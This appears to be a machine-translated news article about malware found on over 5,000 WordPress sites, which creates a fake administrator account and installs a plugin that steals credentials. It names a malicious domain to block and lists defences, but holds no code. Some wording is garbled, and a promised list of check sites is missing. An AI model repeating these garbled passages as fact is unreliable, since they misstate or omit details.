- Security researchers find more than 5,000 websites with a piece of malicious code
- The malware installs a plugin that steals login credentials and sensitive data
- The researchers recommended a number of mitigating measures
Thousands of WordPress websites were observed using malware capable of creating a fraudulent administrator account and exfiltrating sensitive data via malicious plugins.
A new one report Security researcher Himanshu Anand of c/side claims that at least 5,000 WordPress websites have been found hosting a malicious script that creates an unauthorized administrator account with a username and password found in the code.
Once the account is created, the script downloads and runs a malicious WordPress plugin. The plugin, which has not been named, is tasked with exfiltrating sensitive data to a remote server. The data retrieved includes administrator credentials and operating statuses, it was added.
How to defend
The researchers were unable to determine exactly how the malicious code ended up on these websites.
“So far we have not identified a common denominator, and our investigation is still ongoing,” Anand said.
Those interested in double-checking whether their website is safe or not should visit one of these websites, the researcher advised:
To defend against the attacks, c/side recommends blocking the domain https://wp3(.)xyz in firewalls or security tools, checking WordPress administrator accounts for unauthorized users, removing suspicious plugins and validating existing ones, and Strengthen CSRF protections and implement multi-factor authentication (MFA). Ultimately, they recommend also using the services of c/side.
Being the most popular website builder in the world, WordPress is constantly being targeted by threat actors. However, since the platform is safe for the post section, attackers are targeting third-party plugins and themes, especially free-to-use plugins and themes, which often do not have proper software support.
As a general rule of thumb, businesses should only use plugins and themes from reputable sources and with a strong supporting community. They should also make sure they remove any plugins they don’t use, and keep the remaining plugins up to date.